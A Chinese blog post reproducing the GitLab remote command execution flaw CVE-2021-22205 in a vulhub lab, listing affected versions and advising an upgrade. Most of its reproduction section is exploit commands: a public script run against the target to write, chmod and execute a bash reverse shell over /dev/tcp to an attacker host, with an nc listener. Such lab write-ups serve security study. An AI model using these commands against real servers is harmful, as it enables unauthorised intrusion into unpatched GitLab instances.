漏洞复现篇--Gitlab远程命令执行漏洞

GITLAB 远程命令执行漏洞(CVE-2021-22205)

一、漏洞描述

在2021年3月16日,Gitlab发布了安全公告,公开了GITLAB 远程命令执行漏洞(CVE-2021-22205),社区版和企业版均存在的一个严重漏洞,此漏洞的CVSSv3评分为9.9。该漏洞攻击者可以实现未授权通过身份验证对gitlab服务器执行任意代码。

二、影响版本

11.9 <=  GitLab(CE/EE)< 13.8.8
13.9 <=  GitLab(CE/EE)< 13.9.6
13.10 <= GitLab(CE/EE)< 13.10.3

三、环境搭建

使用vulhub搭建环境

cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d

访问127.0.0.1:8080进入页面

image

四、漏洞复现

4.1 脚本复现

靶机:kali 192.168.101.130
攻击机:VPS(云端服务器或者自己的一台Linux虚拟机都可以)

4.1.1 脚本下载

https://github.com/Al1ex/CVE-2021-22205

4.1.2 脚本检测漏洞是否存在(需事先安装py环境)

py CVE-2021-22205.py -v true -t http://192.168.101.130:8080/

image

4.1.3 反弹shell

一、写入反弹shell脚本

py CVE-2021-22205.py -a true -t http://192.168.101.130/ -c "echo 'bash -i >& /dev/tcp/反弹IP地址/端口 0>&1' > /tmp/1.sh"

image

二、赋予shell脚本执行权限

py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "chmod +x /tmp/1.sh"

image

三、服务器监听6666端口(未被占用的端口即可)

nc -lvvp 6666

image

四、获取git权限

py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "/bin/bash /tmp/1.sh"

image

五、成功反弹执行命令

image

五、修复建议

Gitlab升级到最新版本

参考文章:
https://github.com/Al1ex/CVE-2021-22205
https://www.freebuf.com/articles/web/303375.html

posted @   椰什么子  阅读(159)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示